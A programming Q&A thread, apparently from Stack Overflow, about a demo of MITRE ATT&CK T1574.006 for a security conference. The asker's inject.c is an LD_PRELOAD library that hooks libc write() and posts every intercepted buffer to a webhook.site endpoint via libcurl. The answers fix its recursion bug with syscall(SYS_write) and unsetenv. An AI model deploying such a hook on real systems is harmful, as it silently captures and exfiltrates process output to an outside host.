# libcurl and LD_PRELOAD

Tags: c, libcurl, ld-preload

I'm creating a small example of a program using LD_PRELOAD in order to demonstrate Mitre ATT&CK ID T1574.006 at a security conference. I have it working for the most part but one of the problems that I'm running into is using libcurl as part of the demonstration. When I use the example POST code here: https://curl.se/libcurl/c/http-post.html my program keeps looping until I terminate it and does not post any data.

If anyone can point me in the right direction I would appreciate it. Essentially what I'm trying to do is before returning to the standard write function post the data off to a site.

Here is the code:

**main.c**

```
#include <unistd.h>
#include <string.h>

int main(int argc, char **argv) {
    const char *msg = "Hello write\n";
    // 1 writes to stdout file descriptor
    write(1, msg, strlen(msg));
    return 0;
}
```

**inject.c**

```
#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <curl/curl.h>
#include <string.h>
void postData(char *postData) {

  CURL *curl;
  CURLcode res;

  /* In windows, this will init the winsock stuff */
  curl_global_init(CURL_GLOBAL_ALL);

  char testData[500];
  strcpy(testData, "testData=");
  strcat(testData, postData);
  printf("%s\n", testData);

  /* get a curl handle */
  curl = curl_easy_init();
  if(curl) {
    /* First set the URL that is about to receive our POST. This URL can
       just as well be a https:// URL if that is what should receive the
       data. */
    curl_easy_setopt(curl, CURLOPT_URL, "https://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx");
    /* Now specify the POST data */
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, testData);

    /* Perform the request, res will get the return code */
    res = curl_easy_perform(curl);
    /* Check for errors */
    if(res != CURLE_OK)
      fprintf(stderr, "curl_easy_perform() failed: %s\n",
              curl_easy_strerror(res));

    /* always cleanup */
    curl_easy_cleanup(curl);
  }
  curl_global_cleanup();
}

ssize_t write(int fd, const void *buf, size_t count) {

  char *p = (char *)buf;
  printf("From main: %s\n", p);
  postData(p);  

  // Look up the next write symbol
  ssize_t (*orig_write)(int fd, const void *buf, size_t count) = dlsym(RTLD_NEXT, "write");

  return orig_write(fd, buf, count);
}
```

Here's how I've been compiling and executing:

```
TARGET = example_6

all: main.c
        gcc main.c -g -o ${TARGET}
        gcc -shared -g -fPIC inject.c -o inject.so -ldl
run:
        LD_PRELOAD=./inject.so ./${TARGET}
```

Answer (score 1, accepted):

`postData` can make `write` calls (e.g. `printf` and `fprintf` calls you have in `postData`). Since `write` is intercepted, it calls into your intercepted `write` function from `postData`...then it goes to `postData` again and continues. So that's how "loop" occurs.

You need to ensure that nothing in `postData` calls `write`. If you do need to print something, you'll have to use another way. You can instead use `syscall` (Linux).

```
syscall(SYS_write, STDOUT_FILENO, testData, strlen(testData));
```

The same could happen with any of the `curl_*` functions too if they happen to call `write`.

Comment: Thank you! That makes complete sense. Never even considered that when I was putting this together. I'm still reading up on LD_PRELOAD. Do you know if I wanted to avoid that behavior is the best plan to fork a child process and then use unsetenv in the child process?

Comment: I don't see any issue with ensuring nothing in `postData` calls `write` (you can easily verify this by checking the curl code). `fork` approach is also fine but if you're going to fork for every `write` call, that's not going to be efficient. Also, you need to `unsetenv` *before* forking (because once `write` resolved to your intercepted call, unsetenv can't change anything).

Answer (score 0):

If anyone comes back to this I ended up using `unsetenv` and that fixed my issue